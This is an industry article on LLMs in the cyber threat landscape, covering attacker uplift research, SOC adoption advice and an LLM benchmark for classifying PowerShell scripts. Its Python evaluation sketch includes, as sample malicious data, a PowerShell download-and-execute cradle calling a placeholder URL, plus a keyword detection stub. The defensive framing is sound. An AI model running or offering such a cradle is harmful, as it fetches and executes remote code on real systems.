A Supporting Role: How LLMs Are Showing Up in the Cyber Threat Landscape

Aug. 1, 2025
As large language models evolve, their influence on cybersecurity is rapidly expanding, empowering defenders with unprecedented capabilities but also lowering the barrier for attackers to scale threats with speed and precision.

As artificial intelligence becomes more advanced, large language models (LLMs), AI systems that can distill waves of data into meaningful outputs for the user, will become the foundation of future innovation. However, as with most technology, the impact of these models will depend on the skill of those using them.

We’re beginning to see this now in cybersecurity. While cyber defenders are using LLMs to protect the IT home front, threat actors are finding ways to make their attacks more efficient and to operate at larger scale. The good news is that large language models offer clear advantages for defenders in this ongoing battle against cyber threats. The key for cyber defenders will lie in understanding traditional and LLM-enabled cyber-attack use cases, implementing LLMs effectively within the defender community, and using the proper tools and frameworks to track the technology's progression.

The Current Relationship Between LLMs and Threat Actors

One of the key advantages LLMs offer to threat actors is their ability to democratize access to cyber-attack knowledge. The barrier to entry for recreating cyber-attack procedures is lower than ever before. Any modern LLM enables users with little technical background to write functional code, like a remote access tool, which could potentially be misused.

The good news is that many of the potential new threats, such as automated exploitation or widespread personalized phishing scams, remain theoretical for now. Current model capabilities prevent threat actors from fully leveraging AI for high-impact cyber-attacks; complex, multi-stage attacks still require human intervention and expertise.

However, what happens when those bottlenecks are no longer present? Recently, Splunk conducted research to determine just how proficient current LLMs are at aiding current versions of cyber-attacks — and how close we may be to automated attacks in the future.

Now is the time for cybersecurity professionals to dedicate efforts and attention to understanding emerging risks, anticipating attack scenarios, and developing effective defenses, as the capabilities of models in this domain will continue to improve.

The evaluation found that open-weight models, leveraged as an assistant, can improve the speed and efficiency of attacks by accurately recreating attack procedures in 45% of test cases overall, with success rates as high as 80 to 100% for many common attack techniques. This research suggests that, while LLMs are unable to produce new types of attacks, they are highly proficient in reproducing many specific attack procedures that already exist.

Using LLMs Correctly 

If cyber defenders aren’t careful, the dangers of LLMs may come not only from threat actors but also from unintended risks or consequences caused by the defender's misuse of LLMs. AI systems come with their own technical management complexities and their own ecosystem of cybersecurity risks.

Before implementing AI in any analyst workflow, it’s essential to make a few determinations:

●     Where will LLMs be most effective, and what does my team need? Identify repetitive, time-consuming, and detail-oriented problems that involve summarizing or generating large amounts of human-language text.

●     What does intervention look like? Remember, AI is here to help the cybersecurity team. Determine where in the workflow analysts should check the LLM's work to ensure SOC decisions are made on accurate insights. It is vital to keep a human in the loop.

●     How often should our team audit the LLM's work? The team should regularly check the LLM outputs, as well as the overall effectiveness of the process. Over time, the model, or the problem, may drift.

Answering these questions will help your teams identify high-impact use cases enabled by today's LLMs. 
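The human-in-the-loop and audit principles above can be sketched as a minimal triage gate. This is an illustrative sketch, not a real product integration: the `Alert` fields, the `llm_classify` callable, and the routing rules are all hypothetical assumptions standing in for whatever model and alert schema a team actually uses.

```python
from dataclasses import dataclass
from typing import Callable, List

@dataclass
class Alert:
    id: str
    severity: str   # hypothetical field: "low" | "medium" | "high"
    text: str

@dataclass
class TriageResult:
    alert_id: str
    llm_label: str          # "benign" | "suspicious"
    needs_human_review: bool

def triage(alerts: List[Alert],
           llm_classify: Callable[[str], str],
           audit_log: List[TriageResult]) -> List[TriageResult]:
    """Route each alert through the LLM, but keep a human in the loop:
    anything the model flags as suspicious, or any high-severity alert,
    is queued for analyst review rather than auto-closed."""
    results = []
    for alert in alerts:
        label = llm_classify(alert.text)
        review = (label == "suspicious") or (alert.severity == "high")
        result = TriageResult(alert.id, label, review)
        results.append(result)
        audit_log.append(result)  # retained so the team can audit for drift
    return results
```

The audit log is the piece teams most often skip: keeping every LLM verdict alongside the eventual analyst disposition is what makes the periodic drift check in the third bullet possible.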

The Underlying Potential for Cyber Defenders 

Once analyst teams determine when and how to use AI effectively, there is a real chance to optimize productivity using LLMs. Just like LLMs can help mitigate burnout for content creation or research, they can also help analysts streamline and triage security alerts and event review. Due to their ability to comprehend human language, cyber analysts can fine-tune LLMs to help with increasingly specific cyber-domain-related tasks.

Models can also help speed up post-incident tasks, such as summarizing the details of an attack and the SOC’s corresponding response. In a threat hunting exercise, we tested how multiple open-weight LLMs would perform in classifying the intent of 2,000 PowerShell scripts — 1,000 had benign code and 1,000 had malicious code.

The results produced a promising combination of high accuracy with very few false negatives. In addition, the time to classify varied between 0.75 seconds and 3 seconds per script. This amounted to a 99% reduction in initial classification time for PowerShell scripts, compared to the 5 to 12 minutes an average human analyst needs per script!
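A harness for this kind of benchmark is straightforward to sketch. The version below is a simplified illustration, not Splunk's actual test setup: `evaluate_classifier` and its metric names are hypothetical, and the `classify` callable would be backed by an open-weight LLM in practice rather than the keyword stub used in the usage example.

```python
import time
from typing import Callable, Dict, List, Tuple

def evaluate_classifier(
    scripts: List[Tuple[str, str]],      # (script_text, true_label)
    classify: Callable[[str], str],      # returns "benign" or "malicious"
) -> Dict[str, float]:
    """Score a script classifier on the metrics the exercise above reports:
    overall accuracy, false negatives (malicious scripts labeled benign),
    and mean wall-clock time per classification."""
    correct = false_negatives = 0
    start = time.perf_counter()
    for text, truth in scripts:
        predicted = classify(text)
        if predicted == truth:
            correct += 1
        elif truth == "malicious":
            false_negatives += 1
    elapsed = time.perf_counter() - start
    return {
        "accuracy": correct / len(scripts),
        "false_negatives": false_negatives,
        "seconds_per_script": elapsed / len(scripts),
    }

# Usage with a trivial stand-in classifier (an LLM call would go here):
stub = lambda t: "malicious" if "DownloadString" in t else "benign"
data = [
    ("Get-ChildItem C:\\Users", "benign"),
    ("IEX (New-Object Net.WebClient).DownloadString('http://x')", "malicious"),
]
report = evaluate_classifier(data, stub)
```

Tracking false negatives separately from accuracy matters here: in a SOC, a malicious script waved through as benign is far costlier than a benign one flagged for review.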

What the LLM Future Holds for Both Defender and Attacker

The future application of LLMs in security is both exciting and harrowing. We know that on the horizon is the steadily increasing use of agentic AI, or AI systems that can learn, make, and execute decisions independently. As threat actors develop AI agents with attack capabilities, the ability to deploy them at scale may substantially increase the speed of effective cyber-attacks. Now is the time for cyber defenders to improve their understanding and application of LLMs to keep parity with any advances in attacks. With the overwhelming scale and variety of text-based analysis tasks in the modern SOC, the near-term "AI edge" is the defenders' for the taking.

About the Author

Ryan Fetterman | Senior Manager at Splunk on the SURGe team

Ryan Fetterman is a Senior Manager at Splunk on the SURGe team, joining after over a decade spent in windowless basements conducting government research and consulting. He is a co-author of the PEAK Threat Hunting Framework and the upcoming Threat Hunter’s Cookbook. Ryan holds a Doctorate and a master’s degree in engineering from George Washington University and a cybersecurity undergraduate degree from Penn State University. His favorite part of any project is when someone says, “We just got new data.”